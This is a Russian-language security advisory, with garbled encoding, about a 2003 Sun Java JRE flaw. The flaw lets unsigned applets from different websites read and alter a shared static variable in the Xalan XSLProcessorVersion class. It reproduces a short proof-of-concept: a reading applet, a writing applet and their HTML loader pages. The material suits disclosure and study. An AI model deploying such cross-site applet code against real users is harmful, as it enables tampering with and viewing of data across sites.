»зменение статических переменных другого домена в Sun Java

ƒата публикации:
24.10.2003
ƒата изменени€:
17.10.2006
¬сего просмотров:
1078
ќпасность:
Ќизка€
Ќаличие исправлени€:
 оличество у€звимостей:
1
CVSSv2 рейтинг:
CVE ID:
Ќет данных
¬ектор эксплуатации:
¬оздействие:
CWE ID:
Ќет данных
Ќаличие эксплоита:
Ќет данных
”€звимые продукты:
”€звимые версии: Sun Java SDK 1.4.2_01 JDK 1.x, Sun Java JRE 1.4.x

ќписание: ”€звимость обнаружена в Sun Java. «лонамеренный неподписанный апплет может манипулировать некоторыми статическими переменными.

Ќекоторые недокументированные статические переменных доступны из общедоступной пам€ти различными апплетами в одно и тоже врем€. ”€звимость обнаружена в "org.apache.xalan.processor.XSLProcessorVersion" классе. ”€звимость может эксплуатироватьс€ злонамеренным Web сайтом, чтобы изменить или просматривать данные из другого Web сайта. ƒл€ успешной эксплуатации, требуетс€ одновременное посещение пользователем обеих сайтов.

ѕример/Ёксплоит:

/* Illegalaccess.org java exploit */
/* coded by Marc Schoenefeld      */

import java.awt.Graphics;

public class ReadApplet extends java.applet.Applet {

    public void paint(Graphics g)
    {

System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION);
    }

   static {

System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION);
   }
 
==========READAPPLET=========================

==========WRITEAPPLET=========================
import java.awt.Graphics;


public class WriteApplet extends java.applet.Applet {
    public void paint(Graphics g)
    {
        org.apache.xalan.processor.XSLProcessorVersion.S_VERSION += "a";
    }


   static {
      org.apache.xalan.processor.XSLProcessorVersion.S_VERSION = "altered
from
SiteA";
  }
 
==========WRITEAPPLET=========================


=========Write.html============================
<HTML>
<BODY BGCOLOR=#66FF66>

WriteApplet, write to variable
Marc (marc@org.illegalaccess)

<applet codebase=. code=WriteApplet.class width=100 height=100>
</applet>
</BODY>
</HTML>

========Read.html=============================
<HTML>
<BODY BGCOLOR=#6666FF>

ReadApplet, read from variable
Marc (marc@org.illegalaccess)

<applet codebase=. code=ReadApplet.class width=100 height=100>
</applet>
</BODY>
</HTML>

URL производител€:http://www.sun.com

–ешение:—пособов устранени€ обнаруженной у€звимости не существует в насто€щее врем€.

—сылки: Cross Site Java applets

или введите им€

CAPTCHA